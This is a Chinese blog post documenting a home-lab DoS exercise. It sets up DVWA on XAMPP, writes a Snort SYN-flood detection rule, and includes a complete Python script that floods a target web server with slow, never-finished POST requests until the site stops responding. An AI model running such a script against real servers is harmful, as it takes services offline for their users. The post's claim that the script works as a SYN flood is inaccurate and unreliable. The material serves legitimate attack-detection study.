美文网首页
使用Python+Snort进行DoS攻防实战

使用Python+Snort进行DoS攻防实战

作者: 走错说爱你 | 来源:发表于2021-11-30 20:56 被阅读0次

最近对DoS攻击进行了实战,这里做个记录

环境

实验用到了两台虚拟机,分别是攻击机和靶机,其配置如下:

  • 攻击机
    • Windows 10
    • Python3.8.2
  • 靶机
    • Ubuntu 20.04
    • web server(这里用的DVWA作为网站,xamp作为服务器)
    • Snort 2.9.18.1

环境搭建

攻击机

直接在官网下载Python3,无脑双击安装即可

靶机

网站搭建

下载网站源码,这里直接拿的DVWA的源码做实验

下载官方推荐的xampp

执行命令:

sudo chmod 777 xampp-linux-x64-7.4.3-0-installer.run
sudo ./xampp-linux-x64-7.4.3-0-installer.run

在弹出来的界面处,点击Welcome界面,点击Open Application Folder

打开目录

找到hotdocs文件夹,将解压后的dvwa网站源码放进去,并运行以下命令:

sudo chmod 777 -R DVWA-master

点击Manage Servers,然后点击Start All按钮:

start all

全绿即可。

如果绿不了,尝试以下命令即可解决:

sudo service mysql stop
sudo service mysqld stop
sudo service nginx stop
sudo service apache stop
sudo service apache2 stop

然后修改网站源码下的config文件夹内的config.inc.php.distconfig.inc.php,然后更改文件内容(主要是数据库账号密码)

然后就可以打开网站了:


网站搭建成功

Snort安装

这里参考博客进行安装,不再赘述

环境配置

靶机snort配置

首先使用命令编辑snort.conf

sudo gedit /etc/snort/snort.conf

将其中的RULE_PATH更改为实际环境中存放规则的路径

使用命令编辑local.rules(具体路径根据实际情况来):

sudo gedit /etc/snort/rules/rules/local.rules

添加DoS攻击检测规则在文件末尾:

alert tcp any any -> $HOME_NET 80 (flags: S; msg: "Possible DoS Attack Type: SYN flood"; classtype:attempted-dos; flow:stateless; sid:3; detection_filter:track by_dst, count 20, seconds 10;)

其中:

  • alert表示显示为告警
  • tcp表示检测的协议
  • any any表示检测任意IP和端口发送的数据包
  • ->表示to
  • $HOME_NET表示目的ip
  • 80表示目的端口
  • flags用于检查是否存在特定的TCP标志位,这里的-S表示- SYN - Synchronize sequence numbers,其他参数具体可见官方文档
  • msg表示显示在告警中的描述
  • classtype表示告警分类,不可随意命名,其可选参数可见官方文档
  • flow关键字与会话跟踪一起使用,它允许规则只适用于交通流的某些方向。这里的stateless表示触发器与流处理器的状态无关,其他参数具体可见官方文档
  • sid表示规则的唯一标识符,由于100-1,000,000的号码均已被注册,因此需要自定义一个该范围之外的数字
  • detection_filter定义了一个速率,在规则生成事件之前,源主机或目标主机必须超过这个速率,这里设定为10秒内的数据包达到20个即判定为DoS攻击

规则设定完成之后,首先运行命令查看网卡:

ifconfig
网卡查看

注意图中红框圈出的地方即为网卡标识符

然后验证并配置规则:

sudo snort -T -c /etc/snort/snort.conf -i ens33

其中:

  • -c表示configuration,即使用/etc/snort/snort.conf作为配置文件
  • -i表示interface,即调用的网卡接口,这里使用上文中查看到的网卡标识符

出现以下界面则表示规则书写并配置正确:


规则配置成功

攻击机DoS脚本

参考网上的DoS攻击源码,改一改使其适用于Python3,脚本源码为:

#!/usr/bin/env python
import socket
import time
import threading
#Pressure Test,ddos tool
#---------------------------
MAX_CONN=20000
PORT=80
HOST="192.168.80.133"
PAGE="/DVWA-master/login.php"
#---------------------------
 
buf=(("POST %s HTTP/1.1\r\n"
"Host: %s\r\n"
"Content-Length: 10000000\r\n"
"Cookie: dklkt_dos_test\r\n"
"\r\n" % (PAGE,HOST)).encode())
 
socks=[]
 
def conn_thread():
    global socks
    for i in range(0,MAX_CONN):
        s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        try:
            s.connect((HOST,PORT))
            s.send(buf)
            print("Send buf OK!,conn=%d\n"%i)
            socks.append(s)
        except Exception as ex:
            print("Could not connect to server or send error:%s"%ex)
            time.sleep(10)
#end def
 
def send_thread():
    global socks
    while True:
        for s in socks:
            try:
                s.send(b"f")
                #print("send OK!")
            except Exception as ex:
                print("Send Exception:%s\n"%ex)
                socks.remove(s)
                s.close()
        time.sleep(1)
#end def
 
conn_th=threading.Thread(target=conn_thread,args=())
send_th=threading.Thread(target=send_thread,args=())
 
conn_th.start()
send_th.start()

然后保存为DOS.py备用
其攻击原理为不停地向目标机器发送TCP握手请求,发送SYN包建立连接,但不发送ACK包完成连接,从而导致目标机器一直处于等待连接建立的状态,消耗大量系统资源,从而没有剩余资源对正常的网络请求进行响应。

攻击&检测

在靶机使用命令启动snort:

sudo snort -A console -q -c /etc/snort/snort.conf -i ens33

其中:

  • -A console表示显示标准的告警输出
  • -q表示quiet,即以静默模式启动
  • -c表示配置文件
  • -i表示接口

然后在攻击机中,打开cmd窗口,使用命令运行脚本:

python3 DOS.py
实施攻击

此时,通过浏览器打开原网站,可以发现页面无法正常加载,攻击实施成功,甚至还把数据库账号密码爆了出来hhhh(图中打码处为数据库密码):


无法打开网页

然后查看靶机,可看到检测到了DoS攻击,表明检测规则有效:


检测到DoS攻击

参考资料

相关文章

  • 使用Python+Snort进行DoS攻防实战

    最近对DoS攻击进行了实战,这里做个记录 环境 实验用到了两台虚拟机,分别是攻击机和靶机,其配置如下: 攻击机Wi...

  • waf的使用必看

    什么是waf? 如何打造一款可靠的WAF(Web应用防火墙)? WAF攻防实战 如何正确的使用阿里云盾网站安全防御...

  • 19.dos与ddos攻防

    dos分类:1.d网络基于巨量的Flood耗尽目标网络带宽资源如:ICMP Flood, UDP Flood2.d...

  • 给你的情书15/100-四小天鹅圆舞曲

    亲爱的小嘉咪宝贝: 今天的飞盘课上,你们进行了实战演练,攻防节奏转换很快,你内外衣服全汗湿了,很爽吧?! 喜欢你们...

  • 四种假消息攻击-恶搞你的室友

    关键词:ARP欺骗 ICMP重定向 IP欺骗 DoS攻击 #00x1 前言 在学习网络攻防技术时如果只对各种...

  • 围棋课20171108

    围棋课20171108 今天围棋课给同学们讲了一局实战攻防,让同学们跟着我的讲解思路,认识围棋的攻防要点。从围棋的...

  • 什么是网络安全攻防演练?有什么意义?

    攻防演练也称为护网行为,是针对全国范围的真实网络目标为对象的实战攻防活动,旨在发现、暴露和解决安全问题,更是检验我...

  • 逆向 - init

    book 汇编语言 LLVM CookBook 密码学 攻防实战 OS X 与 iOS 内核 iOS 应用安全 黑...

  • Objective-C代码混淆

    参考原文:iOS安全攻防(二十三):Objective-C代码混淆 混淆本质就是进行宏替换,让别人使用class-...

  • DOS使用.bat文件对文件进行合并。

    copy /b .log+.txt all.log

网友评论

      本文标题:使用Python+Snort进行DoS攻防实战

      本文链接:https://www.haomeiwen.com/subject/brnrxrtx.html